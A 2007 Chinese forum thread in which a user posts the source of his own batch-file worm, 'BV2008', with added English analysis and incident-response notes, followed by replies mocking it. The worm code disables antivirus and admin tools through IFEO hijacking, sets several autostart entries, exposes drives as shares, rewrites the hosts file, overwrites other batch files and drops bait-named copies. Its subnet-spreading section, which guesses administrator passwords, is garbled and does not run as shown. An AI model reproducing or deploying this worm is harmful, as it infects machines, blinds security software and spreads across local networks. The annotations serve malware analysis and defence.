[技术原创] 我昨天个那个病毒 主要源代码……

金剑
发表于 2007-3-5 16:41:24 | 显示全部楼层 |阅读模式
:: ---------------------------------------------------------------------------
:: Batch-file worm sample (self-labelled "BV2008") as posted to the forum in
:: 2007, annotated for analysis. Read top to bottom it (1) neuters AV and
:: admin tools through IFEO "Debugger" values, (2) installs itself under the
:: Windows directory with several autostart entries, (3) exposes the drive
:: and admin shares, (4) rewrites the hosts file to black-hole AV vendor and
:: search sites, (5) overwrites other .bat files and seeds share/startup
:: folders with bait-named copies, and (6) loops over the local subnet trying
:: a fixed password list against the admin share. The subnet section is
:: garbled as rendered and does not execute as shown. Defender notes are
:: prefixed "DFIR:".
:: ---------------------------------------------------------------------------
@echo off
:: --- AV / tool kill via Image File Execution Options -----------------------
:: Each Debugger value makes Windows start svchost.exe in place of the named
:: program, so it silently never runs. The names appear to be McAfee
:: (Mcshield5, VsTskMgr, UpdaterUI), Rising (Rav*, CCenter), Jiangmin (KV*.kxp)
:: and Kaspersky (Kav) processes; cmd.exe, regedit.exe and Regedt32.exe are
:: hijacked as well, which is what blocks interactive clean-up.
:: DFIR: any Debugger value under this key whose data is not a real debugger
:: is an IoC; removing the subkeys restores the programs.
set KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\VsTskMgr.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\naPrdMgr.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\UpdaterUI.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\TBMon.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\scan32.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Ravmond.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\CCenter.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\RavTask.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Rav.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Ravmon.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\RavmonD.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\RavStub.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\KVXP.kxp" /v Debugger /d svchost.exe /f
reg add "%KEY%\kvMonXP.kxp" /v Debugger /d svchost.exe /f
reg add "%KEY%\KVCenter.kxp" /v Debugger /d svchost.exe /f
reg add "%KEY%\KVSrvXP.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\KRegEx.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\UIHost.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\TrojDie.kxp" /v Debugger /d svchost.exe /f
reg add "%KEY%\FrogAgent.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\cmd.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\regedit.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Regedt32.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\freepp.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\free.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Kav.exe" /v Debugger /d svchost.exe /f
:: The fourteen lines below just repeat the first Mcshield5.exe entry; they are
:: redundant (presumably placeholders the author never filled in).
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
reg add "%KEY%\Mcshield5.exe" /v Debugger /d svchost.exe /f
:: --- Persistence ------------------------------------------------------------
:: Argument 0 is the running script's own path. It is copied to
:: windir\BV2008.bat and registered in both the HKLM and HKCU Run keys under
:: the value name "Ravupdate" (apparently chosen to look like a Rising updater).
:: DFIR: Run values pointing at a .bat in the Windows directory are the IoC.
set a=BV2008
copy %0 %windir%\%a%.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Ravupdate /t REG_SZ /d %windir%\%a%.bat /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Ravupdate /t REG_SZ /d %windir%\%a%.bat /f > nul
:: "echo" is indirected through a variable so the literal word does not appear
:: on the command lines (trivial string-signature evasion). Appends legacy
:: autostart entries: win.ini [windows] run= and load=, and system.ini [boot]
:: shell=. The section headers are appended after whatever the files already
:: contain.
set BV20081=echo
%BV20081% [windows] >> %windir%\win.ini
%BV20081% run=%windir%\%a%.bat >> %windir%\win.ini
%BV20081% load=%windir%\%a%.bat >> %windir%\win.ini
%BV20081% [boot] >> %windir%\system.ini
%BV20081% shell=explorer.exe %a%.bat >> %windir%\system.ini
:: --- Share exposure ---------------------------------------------------------
:: Re-creates the administrative shares and additionally publishes the whole
:: C: and D: drives as shares named "c" and "d".
:: DFIR: unexpected c / d shares in "net share" output are the tell here.
net share ADMIN$
net share C$
net share IPC$
net share c=c:
net share d=d:
:: --- Hosts-file hijack ------------------------------------------------------
:: The first line uses a truncating redirect and the rest append, so the hosts
:: file is replaced with entries that send AV vendor, Microsoft and search
:: engine names to 127.0.0.1 (blocks signature updates and web look-ups).
:: DFIR: a hosts file mapping vendor names to loopback is a reliable IoC.
set BV20082=echo
%BV20082% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.baidu.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.jiangmin.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.baidu.cn >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
:: This line truncates the hosts file a second time, so only the entries from
:: here on survive; the "www." entries above are discarded.
%BV20082% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.kingsoft.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.rising.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.rising.com.cn >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 www.mmsk.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 shadu.baidu.com >> %windir%\system32\drivers\etc\hosts
%BV20082% 127.0.0.1 online.rising.com.cn >> %windir%\system32\drivers\etc\hosts
:: --- Second copy under a random name, more autostart entries ----------------
:: A further copy with a random numeric name goes into the Windows directory
:: and is registered in the HKCU Run key as "html".
set x=%random%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
:: RunServices is a Windows 9x-era key; NT-based Windows does not process it,
:: so this entry is inert on XP and later (still an IoC in the registry).
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v BV2008 /t REG_SZ /d "%windir%\%a%.bat" /f > nul
:: File infection: every .bat in system32 and in the Windows directory is
:: overwritten with this script, and so is c:\autoexec.bat.
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
:: Social-engineering drops: copies with double extensions (keygen.exe.bat,
:: crack_it.exe.bat, ...) in a Program Files folder called 系统忠告 ("system
:: advice"), together with a note telling the reader to run crack_it.exe.
md %programfiles%\BV2008\xxx\ > nul
md %programfiles%\BV2008\系统忠告\ > nul
copy %0 %programfiles%\BV2008\Winsts\Rav.txt.bat > nul
copy %0 %programfiles%\BV2008\系统忠告\keygen.exe.bat > nul
copy %0 %programfiles%\BV2008\系统忠告\serialsV7.exe.bat > nul
copy %0 %programfiles%\BV2008\系统忠告\crack_it.exe.bat > nul
:: Both writes truncate, so only the second line ends up in 说明.txt.
echo 请使用 crack_it.exe优化操作系统 > %programfiles%\BV2008\系统忠告\说明.txt
echo 风暴胜者(www.v0day.com) I love you!> %programfiles%\BV2008\系统忠告\说明.txt
:: The ampersand is a command separator here: cmd runs "net share xxx" and then
:: a separate, invalid command starting with 系统忠告=, so the intended share of
:: the BV2008 folder is likely not created.
net share xxx&系统忠告=%programfiles%\BV2008 > nul
:: Seeds a P2P client's shared folder (under Program Files and under C:) with
:: bait-named double-extension copies; "copy" is indirected like "echo" above.
set BV2008a=copy
%BV2008a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%BV2008a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%BV2008a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%BV2008a% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%BV2008a% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%BV2008a% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
:: --- Spreading stage; label 20052 is re-entered by the goto at the end -----
:20052
chcp 1252 > nul
:: The BV2008 variable is never set in this script, so this line expands to two
:: random numbers joined together and fails as an unknown command
:: (junk / obfuscation).
%random%%BV2008%%random%%BV2008%
:: More autostart and visible drops: all-users Start Menu and Autostart folder
:: (German names, "Startmenü" rendered here as "Startmen"), the user's desktop
:: and the C: root, each under a random name.
copy %0 "C:\Documents and Settings\All Users\Startmen Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmen Programme\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmen %random%.bat" > nul
copy %0 "C:\Documents and Settings\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
:: Same junk pattern as above; the 2008 variable is also undefined.
%random%%2008%%random%%2008%
:: The block from here through "goto bb" is garbled as rendered and does not
:: parse. Its intent is readable nonetheless: take the local IP address, walk
:: the last octet of the subnet and, for each host that answers a ping, try
:: the fixed password list below against the IPC$ share, copy BV2008.bat to
:: the admin share and start it remotely.
:: DFIR: the hardcoded password list is the defence point here. Unique local
:: administrator passwords and blocking SMB between workstations stop this
:: stage outright; bursts of "net use" to ipc$ and a BV2008.bat appearing under
:: admin$ are the detections.
for f tokens=2 delims= %%a in ('ipconfig ^ find i ip address') do (set ip=%%
a&& goto gof)
gof
set ip=%ip =%
for f tokens=1,2,3 delims=. %%b in (%ip%) do (set ip1=1
call bb %%b %%c %%d %ip1%)
bb
set IP=%1.%2.%3.%ip1%
ping %IP% -n 2  findstr i time && net use %IP%ipc$  useradministrator && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  administrator && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  stu && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  student && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  work && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  123 && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  123456 && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
ping %IP% -n 2  findstr i time && net use %IP%ipc$  baidu && copy BV2008.bat %IP%admin$ && start %IP%admin$BV2008.bat
set a ip1+=1
if %ip1% lss 255 goto bb
:: Kills any process whose image name contains 监控 ("monitor") or 专杀
:: ("dedicated removal tool"), i.e. Chinese AV monitors and one-off cleaners.
taskkill /f /im *监控.exe > nul
taskkill /f /im *专杀.exe > nul
:: Unconditional jump back to the spreading stage: the script never exits on
:: its own.
goto 20052
:: BV2008 by 2008
:: Please Not user Fbsz(www.v0day.com)
azazkjkj
发表于 2007-3-5 17:00:52 | 显示全部楼层
低级病毒……
看起来好像OSO……
金剑
 楼主| 发表于 2007-3-5 17:00:58 | 显示全部楼层
具有局域网感染……
azazkjkj
发表于 2007-3-5 17:08:59 | 显示全部楼层
我解决得掉,仔细看完病毒后。
我给你提个意见,别做类似OSO的病毒了,转行吧。
连Autorun都没封。
天下无毒
发表于 2007-3-5 17:12:52 | 显示全部楼层
呵呵  号称雅虎的反间谍专家都能杀    哎
i_Kaspersky
发表于 2007-3-5 17:19:46 | 显示全部楼层
妈呀,查看这个帖子费尔报告有毒啊。

leohare
发表于 2007-3-5 17:35:56 | 显示全部楼层

回复 #6 i_Kaspersky 的帖子

我的费尔也报了。看样子不像误报
天下无毒
发表于 2007-3-5 17:38:03 | 显示全部楼层
NOD不报
剑指七星
发表于 2007-3-5 18:22:19 | 显示全部楼层
神呀
小朋友又有新作了
逝去の小丑 该用户已被删除
发表于 2007-3-6 11:43:21 | 显示全部楼层
唉~~
做反病毒不成,竟做起病毒来了~
PS:这个病毒实在低级